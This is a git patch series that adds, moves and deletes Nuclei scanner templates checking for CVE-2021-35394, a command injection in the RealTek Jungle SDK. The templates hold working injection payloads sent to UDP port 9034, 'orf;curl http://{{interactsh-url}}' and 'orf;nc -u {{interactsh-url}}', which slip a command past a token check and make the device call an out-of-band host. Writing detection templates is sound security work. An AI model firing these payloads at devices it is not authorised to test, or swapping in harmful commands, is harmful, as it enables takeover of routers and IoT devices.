From 7e5236bb216008bb5e8da8e80d61efd8abe53d14 Mon Sep 17 00:00:00 2001
From: Alexander King <alexander.king@cisa.dhs.gov>
Date: Tue, 10 Oct 2023 08:37:09 -0500
Subject: [PATCH 1/3] Create template for CVE-2021-35394

---
 network/cves/2021/CVE-2021-35394.yaml | 36 +++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 network/cves/2021/CVE-2021-35394.yaml

diff --git a/network/cves/2021/CVE-2021-35394.yaml b/network/cves/2021/CVE-2021-35394.yaml
new file mode 100644
index 00000000000..955070e5752
--- /dev/null
+++ b/network/cves/2021/CVE-2021-35394.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-35394
+
+info:
+  name: RealTek Jungle SDK -  Arbitrary Command Injection
+  author: king-alexander
+  severity: critical
+  description: There is a command injection vulnerability via the UDPServer protocol
+  impact: |
+    Successful exploitation of this vulnerabilty could lead to remote code execution and compromise of the affected system.
+  remediation: |
+    Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
+    - https://onekey.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
+    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
+  tags: cve,cve2021,realtek,rce,kev
+
+udp:
+  inputs:
+    # We bypass the "orf" command, which was supposed to act as a secret token
+    - data: "orf;curl http://{{interactsh-url}}"
+  host:
+    - "{{hostname}}"
+  port: 9034
+
+  matchers-condition: and
+  matchers:
+    - type: word
+      part: interactsh_protocol
+      words:
+        - "http"
+
+    - type: word
+      part: interactsh_request
+      words:
+        - "User-Agent: curl"

From 5bbd9791f103693eb4ecf2c7faf41afb2dd89823 Mon Sep 17 00:00:00 2001
From: Alexander King <alexander.king@cisa.dhs.gov>
Date: Tue, 2 Apr 2024 11:31:18 -0500
Subject: [PATCH 2/3] Create CVE-2021-35394 template

---
 javascript/cves/2021/CVE-2021-35394.yaml | 33 ++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 javascript/cves/2021/CVE-2021-35394.yaml

diff --git a/javascript/cves/2021/CVE-2021-35394.yaml b/javascript/cves/2021/CVE-2021-35394.yaml
new file mode 100644
index 00000000000..01fc857f2f2
--- /dev/null
+++ b/javascript/cves/2021/CVE-2021-35394.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-35394
+
+info:
+  name: RealTek AP Router SDK - Arbitrary Command Injection
+  author: king-alexander
+  severity: critical
+  remediation: Apply the latest security patches or updates provided by RealTek.
+  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
+    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
+  tags: cve,cve2021,realtek,rce,kev
+
+javascript:
+  - code: |
+      const net = require('nuclei/net');
+      const conn = net.Open('udp', `${Host}:${Port}`);
+      conn.Send('orf;nc -u {{interactsh-url}}');
+    args:
+      Host: "{{Host}}:9034"
+      Port: 9034
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: dsl
+        dsl:
+          - success == true
+        condition: and

From bf917a270582e1477f977acc3e0ed43782bec6c4 Mon Sep 17 00:00:00 2001
From: Alexander King <alexander.king@cisa.dhs.gov>
Date: Tue, 2 Apr 2024 12:49:40 -0500
Subject: [PATCH 3/3] Remote template from the network directory

---
 network/cves/2021/CVE-2021-35394.yaml | 36 ---------------------------
 1 file changed, 36 deletions(-)
 delete mode 100644 network/cves/2021/CVE-2021-35394.yaml

diff --git a/network/cves/2021/CVE-2021-35394.yaml b/network/cves/2021/CVE-2021-35394.yaml
deleted file mode 100644
index 955070e5752..00000000000
--- a/network/cves/2021/CVE-2021-35394.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2021-35394
-
-info:
-  name: RealTek Jungle SDK -  Arbitrary Command Injection
-  author: king-alexander
-  severity: critical
-  description: There is a command injection vulnerability via the UDPServer protocol
-  impact: |
-    Successful exploitation of this vulnerabilty could lead to remote code execution and compromise of the affected system.
-  remediation: |
-    Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
-    - https://onekey.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
-    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
-  tags: cve,cve2021,realtek,rce,kev
-
-udp:
-  inputs:
-    # We bypass the "orf" command, which was supposed to act as a secret token
-    - data: "orf;curl http://{{interactsh-url}}"
-  host:
-    - "{{hostname}}"
-  port: 9034
-
-  matchers-condition: and
-  matchers:
-    - type: word
-      part: interactsh_protocol
-      words:
-        - "http"
-
-    - type: word
-      part: interactsh_request
-      words:
-        - "User-Agent: curl"